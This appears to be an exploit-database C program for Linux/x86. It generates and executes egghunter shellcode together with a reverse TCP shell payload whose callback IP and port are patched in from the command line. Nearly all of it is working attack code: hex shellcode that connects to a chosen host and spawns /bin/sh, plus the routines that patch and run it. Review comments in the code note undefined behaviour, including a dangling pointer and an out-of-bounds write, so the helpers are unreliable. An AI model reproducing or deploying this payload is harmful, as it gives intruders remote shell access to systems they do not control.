
# Exploit Title: Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
|
|
# Date: 18/07/2021
|
|
# Exploit Author: d7x
|
|
# Tested on: Ubuntu x86
|
|
|
|
/***
|
|
Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
|
|
Author: d7x
|
|
https://d7x.promiselabs.net/
|
|
https://www.promiselabs.net/
|
|
***/
|
|
|
|
/*
|
|
Egghunter payloads from skape modified to work on a modern up to date architecture
|
|
For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
|
|
Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
|
Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
|
|
*/
|
|
|
|
/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
|
|
$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
|
|
void PrintShellcode(unsigned char* s);
|
|
void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
|
|
unsigned char* ConvertStrToHex(unsigned char* s);
|
|
|
|
// Egghunter variants, one per row.  Each row is zero-padded to 200 bytes, which
// is what lets main() measure them with strlen() and execute them as C strings;
// none of the three rows contains a 0x00 byte.  The 4-byte egg \x90\x50\x90\x50
// sits at byte offset 1 (row 0), 23 (row 1) and 18 (row 2); main() overwrites
// it in place when an egg is supplied on the command line.
unsigned char egghunter[][200] = { \
{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
};

/* Earlier single-buffer form and the original skape byte strings, kept for reference only (not compiled):
unsigned char egghunter[] = \
"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
*/

/* Reverse TCP Shell payload.
   Bytes 0-7 are the egg marker (egg repeated twice): \x90\x50\x90\x50\x90\x50\x90\x50
   Defaults baked in: 127.1.1.1 4444 */
unsigned char shellcode[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; // IP address at bytes eggsize*2+26 .. +29 (default \x7f\x01\x01\x01 = 127.1.1.1); port at bytes eggsize*2+32 .. +33 (default \x11\x5c = 4444) -- patched by main()

// Egg size in bytes; main() uses eggsize*2 (= 8) as the length of the egg
// marker at the start of `shellcode` and as the base for the IP/port offsets.
// It is never modified at run time, even when an egg is supplied.
int eggsize = 4; //default
|
|
|
|
/*
 * Entry point.  argv[1] selects an egghunter row (0-2); optional argv[2] is
 * the egg as exactly 4 or 8 hex digits, argv[3] an IPv4 address and argv[4]
 * a port, both patched into the reverse-shell payload.  Both buffers are
 * printed as "\xNN" C literals and then the selected egghunter row is
 * executed in this process (see the final cast below).
 *
 * NOTE(review): `main` has no return type and does not return a value at
 * the end -- this relies on pre-C99 implicit int.  atoi() is used without
 * <stdlib.h> and inet_aton() without <arpa/inet.h>, so both are implicitly
 * declared under the includes at the top of this file.
 */
main(int argc, char *argv[])
{
    if (argc < 2)
    {
        printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
        printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
        "%s 1 AABB 127.1.1.1 4444\n"
        "%s 2 AABBCCDD 127.1.1.1 4444\n"
        "%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
        printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
        "\nDefault shellcode IP and port 127.1.1.1:4444");
        printf("\n\nAvailable egghunters:"
        "\n0 - access method (39 bytes), requires executable egg"
        "\n1 - access revisited (37 bytes)"
        "\n2 - sigaction (32 bytes)\n"
        );
        return 0;
    }

    // Egghunter row index.  atoi() returns 0 for non-numeric input, so garbage
    // silently selects row 0 rather than being rejected below.
    int eh = atoi((char *)argv[1]);
    if (eh < 0 || eh > 2)
    {
        printf("Invalid Egghunter: %d!\n", eh);
        return 0;
    }

    if (argc > 2)
    {
        // Strip an optional "0x" prefix by advancing the argv pointer itself.
        if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;

        // Only exactly 4 or 8 hex digits (2 or 4 egg bytes) are accepted.
        // NOTE(review): the message below says "at least 4", but the test is exact.
        if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
        {
            printf("Egg has to be at least 4 or exactly 8 bytes!"
            "\nExample eggs: 9050, 9060, C0D3,"
            "\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
            "\n"
            );
            return 0;
        }

        // Reject any "00" digit pair: both buffers are later measured with
        // strlen() and printed as C strings, so a 0x00 byte would truncate them.
        // (int vs size_t comparison in the loop condition is harmless here.)
        int i;
        for (i = 0; i < strlen(argv[2]); i+=2)
            if (argv[2][i] == '0' && argv[2][i+1] == '0')
            {
                printf("No null bytes!\n");
                return 0;
            }
    }

    /* change egg if provided */
    // Byte offset of the 4-byte egg (\x90\x50\x90\x50) inside the selected row;
    // these match the positions of that sequence in the egghunter[] table.
    int eh_offset = 1; // default offset for access method (39 bytes)
    if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
    else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)

    if (argc > 2) {
        unsigned char* new_egg = argv[2], *s, *tmp;  // char* -> unsigned char* without a cast
        printf("Changing egg to %s...\n", new_egg);

        // NOTE(review): ConvertStrToHex() returns the address of a local VLA
        // (see its `return buf;`), so `s` is dangling from here on and every
        // use below is undefined behaviour that only works by stack layout.
        s = ConvertStrToHex(argv[2]);
        tmp = s;

        //fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
        // NOTE(review): strcat() with overlapping source and destination is
        // undefined, and nothing guarantees `s` is NUL-terminated or has room
        // for the 8 bytes being built (see the note on ConvertStrToHex()).
        strcat(tmp, s);
        if (strlen(argv[2]) == 4)
            strcat(tmp, tmp);

        //PrintShellcode(s);
        // First 4 decoded bytes replace the egg in the egghunter row; the full
        // 8-byte marker replaces bytes 0-7 of the payload.
        change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
        change_shellcode_bytes(shellcode, 0, 7, tmp);
    }

    // NOTE(review): strlen() returns size_t; "%d" here and in the payload
    // line below is a format/argument type mismatch.
    printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
    printf("Egghunter shellcode: \n");
    PrintShellcode(egghunter[eh]);

    printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));

    // change shellcode IP address
    unsigned char *s2 = shellcode;
    if (argc > 3)
    {
        printf("%s\n", argv[3]);

        // convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
        // NOTE(review): the return value of inet_aton() is ignored, so on a
        // malformed address `ipaddr` stays uninitialized and the bytes copied
        // below are indeterminate.  The second argument is `&...s_addr`
        // (in_addr_t *) where the API takes `struct in_addr *`.
        struct sockaddr_in ipaddr;
        inet_aton(argv[3], &ipaddr.sin_addr.s_addr);

        // The address occupies payload bytes eggsize*2+26 .. +29.  inet_aton()
        // stores it in network byte order; on a little-endian host, shifting
        // out the low byte first writes the octets in wire order.
        // NOTE(review): an octet equal to 0 is not rejected here and, like a
        // "00" egg pair, truncates the strlen()/PrintShellcode() output.
        int i = eggsize*2+26, a;
        int e = i+3;
        for (i, a = 0; i <= e; i++, a+=8)
        {
            s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
            printf("Byte %d: %.02x\n", i, s2[i]);
        }
    }

    // change shellcode Port
    int port = 4444; //0x115c - default
    if (argc > 4)
    {
        // NOTE(review): atoi() result is not range-checked; values outside
        // 0..65535 or non-numeric input are silently reduced to two bytes.
        port = atoi(argv[4]);
        unsigned int p1 = (port >> 8) & 0xff;  // high byte, written first (network order)
        unsigned int p2 = port & 0xff;         // low byte
        s2[eggsize*2+32] = (unsigned char){p1};
        s2[eggsize*2+33] = (unsigned char){p2};
    }
    printf("Port %d\n", port);
    PrintShellcode(s2);

    printf("\n");
    // Cast the writable, data-segment egghunter row to a function pointer and
    // jump into it: this program runs the egghunter in its own address space,
    // as the usage comment at the top warns.  It depends on that memory being
    // executable (the usage line builds with -z execstack); nothing after
    // this call is reached on the normal path.
    int (*ret)() = (int(*)())egghunter[eh];
    ret();
}
|
|
|
|
/*
 * Copy new[0 .. n-offset] into shellcode_n[offset .. n], both ends inclusive.
 * Does nothing when n < offset.  No bounds are checked: the caller must
 * guarantee shellcode_n holds at least n+1 bytes and new at least n-offset+1.
 */
void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
{
    unsigned char *dst = shellcode_n + offset;
    const unsigned char *src = new;
    int remaining = n - offset + 1;

    while (remaining-- > 0) {
        *dst++ = *src++;
    }
}
|
|
|
|
/*
 * Print the NUL-terminated byte string `s` as a double-quoted C literal of
 * "\xNN" escapes followed by a newline.  Scanning stops at the first 0x00
 * byte, so an embedded null truncates the output.
 */
void PrintShellcode(unsigned char* s)
{
    const unsigned char *p = s;

    printf("\"");
    for (; *p != '\0'; p++) {
        printf("\\x%.02x", (unsigned int) *p);
    }
    printf("\"\n");
}
|
|
|
|
/*
 * Decode a string of hex digit pairs (optional "0x" prefix) into raw bytes.
 *
 * NOTE(review): as written this function is unsound and works only by
 * accident of stack layout:
 *  - `buf` is a VLA local, so `return buf;` hands the caller a dangling
 *    pointer, which main() then strcat()s into;
 *  - `buf[strlen(s)/2] = '\0'` writes one element past the end of `buf`
 *    (index == length) and leaves the array itself unterminated;
 *  - the sscanf() return value is ignored, so non-hex input leaves bytes
 *    uninitialized; `s` is an unsigned char* passed where strlen()/sscanf()
 *    take const char*.
 * A sound version would decode into a caller-supplied buffer of known size
 * and report the number of bytes written.
 */
unsigned char* ConvertStrToHex(unsigned char* s)
{
    if (s[0] == '0' && s[1] == 'x') s += 2;
    unsigned char buf[strlen(s)/2];
    buf[strlen(s)/2] = '\0';  // out-of-bounds write: index equals the array length

    int len = sizeof(buf);  // sizeof on a VLA is evaluated at run time
    size_t count;

    for (count = 0; count < len; count++) {
        sscanf(s, "%2hhx", &buf[count]);  // one byte per two hex digits; result unchecked
        s += 2;
    }

    return buf;  // address of a local: dangling as soon as the function returns
}